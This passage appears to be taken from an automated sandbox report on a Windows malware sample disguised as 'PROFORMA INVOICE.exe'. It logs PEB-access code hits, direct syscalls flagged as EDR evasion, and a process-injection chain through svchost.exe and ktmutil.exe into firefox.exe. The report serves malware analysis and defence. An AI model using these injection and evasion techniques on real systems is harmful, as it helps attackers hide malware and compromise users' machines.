Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A30BCD mov eax, dword ptr fs:[00000030h]	1_2_03A30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A30BCD mov eax, dword ptr fs:[00000030h]	1_2_03A30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A30BCD mov eax, dword ptr fs:[00000030h]	1_2_03A30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADEBD0 mov eax, dword ptr fs:[00000030h]	1_2_03ADEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5EB20 mov eax, dword ptr fs:[00000030h]	1_2_03A5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5EB20 mov eax, dword ptr fs:[00000030h]	1_2_03A5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF8B28 mov eax, dword ptr fs:[00000030h]	1_2_03AF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF8B28 mov eax, dword ptr fs:[00000030h]	1_2_03AF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B04B00 mov eax, dword ptr fs:[00000030h]	1_2_03B04B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	1_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2CB7E mov eax, dword ptr fs:[00000030h]	1_2_03A2CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE4B4B mov eax, dword ptr fs:[00000030h]	1_2_03AE4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE4B4B mov eax, dword ptr fs:[00000030h]	1_2_03AE4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B02B57 mov eax, dword ptr fs:[00000030h]	1_2_03B02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B02B57 mov eax, dword ptr fs:[00000030h]	1_2_03B02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B02B57 mov eax, dword ptr fs:[00000030h]	1_2_03B02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B02B57 mov eax, dword ptr fs:[00000030h]	1_2_03B02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC6B40 mov eax, dword ptr fs:[00000030h]	1_2_03AC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC6B40 mov eax, dword ptr fs:[00000030h]	1_2_03AC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AFAB40 mov eax, dword ptr fs:[00000030h]	1_2_03AFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD8B42 mov eax, dword ptr fs:[00000030h]	1_2_03AD8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A28B50 mov eax, dword ptr fs:[00000030h]	1_2_03A28B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADEB50 mov eax, dword ptr fs:[00000030h]	1_2_03ADEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A38AA0 mov eax, dword ptr fs:[00000030h]	1_2_03A38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A38AA0 mov eax, dword ptr fs:[00000030h]	1_2_03A38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A86AA4 mov eax, dword ptr fs:[00000030h]	1_2_03A86AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	1_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B04A80 mov eax, dword ptr fs:[00000030h]	1_2_03B04A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A68A90 mov edx, dword ptr fs:[00000030h]	1_2_03A68A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6AAEE mov eax, dword ptr fs:[00000030h]	1_2_03A6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6AAEE mov eax, dword ptr fs:[00000030h]	1_2_03A6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A86ACC mov eax, dword ptr fs:[00000030h]	1_2_03A86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A86ACC mov eax, dword ptr fs:[00000030h]	1_2_03A86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A86ACC mov eax, dword ptr fs:[00000030h]	1_2_03A86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A30AD0 mov eax, dword ptr fs:[00000030h]	1_2_03A30AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A64AD0 mov eax, dword ptr fs:[00000030h]	1_2_03A64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A64AD0 mov eax, dword ptr fs:[00000030h]	1_2_03A64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6CA24 mov eax, dword ptr fs:[00000030h]	1_2_03A6CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5EA2E mov eax, dword ptr fs:[00000030h]	1_2_03A5EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A54A35 mov eax, dword ptr fs:[00000030h]	1_2_03A54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A54A35 mov eax, dword ptr fs:[00000030h]	1_2_03A54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ABCA11 mov eax, dword ptr fs:[00000030h]	1_2_03ABCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6CA6F mov eax, dword ptr fs:[00000030h]	1_2_03A6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6CA6F mov eax, dword ptr fs:[00000030h]	1_2_03A6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6CA6F mov eax, dword ptr fs:[00000030h]	1_2_03A6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADEA60 mov eax, dword ptr fs:[00000030h]	1_2_03ADEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AACA72 mov eax, dword ptr fs:[00000030h]	1_2_03AACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AACA72 mov eax, dword ptr fs:[00000030h]	1_2_03AACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A36A50 mov eax, dword ptr fs:[00000030h]	1_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A36A50 mov eax, dword ptr fs:[00000030h]	1_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A36A50 mov eax, dword ptr fs:[00000030h]	1_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A36A50 mov eax, dword ptr fs:[00000030h]	1_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A36A50 mov eax, dword ptr fs:[00000030h]	1_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A36A50 mov eax, dword ptr fs:[00000030h]	1_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A36A50 mov eax, dword ptr fs:[00000030h]	1_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40A5B mov eax, dword ptr fs:[00000030h]	1_2_03A40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40A5B mov eax, dword ptr fs:[00000030h]	1_2_03A40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]	1_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]	1_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]	1_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]	1_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]	1_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]	1_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]	1_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]	1_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]	1_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]	1_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]	1_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]	1_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]	1_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A309AD mov eax, dword ptr fs:[00000030h]	1_2_03A309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A309AD mov eax, dword ptr fs:[00000030h]	1_2_03A309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB89B3 mov esi, dword ptr fs:[00000030h]	1_2_03AB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB89B3 mov eax, dword ptr fs:[00000030h]	1_2_03AB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB89B3 mov eax, dword ptr fs:[00000030h]	1_2_03AB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ABE9E0 mov eax, dword ptr fs:[00000030h]	1_2_03ABE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A629F9 mov eax, dword ptr fs:[00000030h]	1_2_03A629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A629F9 mov eax, dword ptr fs:[00000030h]	1_2_03A629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC69C0 mov eax, dword ptr fs:[00000030h]	1_2_03AC69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	1_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	1_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	1_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	1_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	1_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	1_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A649D0 mov eax, dword ptr fs:[00000030h]	1_2_03A649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AFA9D3 mov eax, dword ptr fs:[00000030h]	1_2_03AFA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB892A mov eax, dword ptr fs:[00000030h]	1_2_03AB892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC892B mov eax, dword ptr fs:[00000030h]	1_2_03AC892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAE908 mov eax, dword ptr fs:[00000030h]	1_2_03AAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAE908 mov eax, dword ptr fs:[00000030h]	1_2_03AAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ABC912 mov eax, dword ptr fs:[00000030h]	1_2_03ABC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A28918 mov eax, dword ptr fs:[00000030h]	1_2_03A28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A28918 mov eax, dword ptr fs:[00000030h]	1_2_03A28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A56962 mov eax, dword ptr fs:[00000030h]	1_2_03A56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A56962 mov eax, dword ptr fs:[00000030h]	1_2_03A56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A56962 mov eax, dword ptr fs:[00000030h]	1_2_03A56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A7096E mov eax, dword ptr fs:[00000030h]	1_2_03A7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A7096E mov edx, dword ptr fs:[00000030h]	1_2_03A7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A7096E mov eax, dword ptr fs:[00000030h]	1_2_03A7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD4978 mov eax, dword ptr fs:[00000030h]	1_2_03AD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD4978 mov eax, dword ptr fs:[00000030h]	1_2_03AD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ABC97C mov eax, dword ptr fs:[00000030h]	1_2_03ABC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB0946 mov eax, dword ptr fs:[00000030h]	1_2_03AB0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B04940 mov eax, dword ptr fs:[00000030h]	1_2_03B04940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A30887 mov eax, dword ptr fs:[00000030h]	1_2_03A30887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ABC89D mov eax, dword ptr fs:[00000030h]	1_2_03ABC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AFA8E4 mov eax, dword ptr fs:[00000030h]	1_2_03AFA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]	1_2_03A6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]	1_2_03A6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5E8C0 mov eax, dword ptr fs:[00000030h]	1_2_03A5E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B008C0 mov eax, dword ptr fs:[00000030h]	1_2_03B008C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A52835 mov eax, dword ptr fs:[00000030h]	1_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A52835 mov eax, dword ptr fs:[00000030h]	1_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A52835 mov eax, dword ptr fs:[00000030h]	1_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A52835 mov ecx, dword ptr fs:[00000030h]	1_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A52835 mov eax, dword ptr fs:[00000030h]	1_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A52835 mov eax, dword ptr fs:[00000030h]	1_2_03A52835

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

Code function: 0_2_00F9A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00F9A66C

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F881AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00F881AC
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00F88189 SetUnhandledExceptionFilter,		0_2_00F88189

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	NtTerminateProcess: Direct from: 0x76F02D5C	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\ktmutil.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: NULL target: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: NULL target: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\ktmutil.exe

Thread register set: target process: 1360

Jump to behavior

Queues an APC in another process (thread injection)

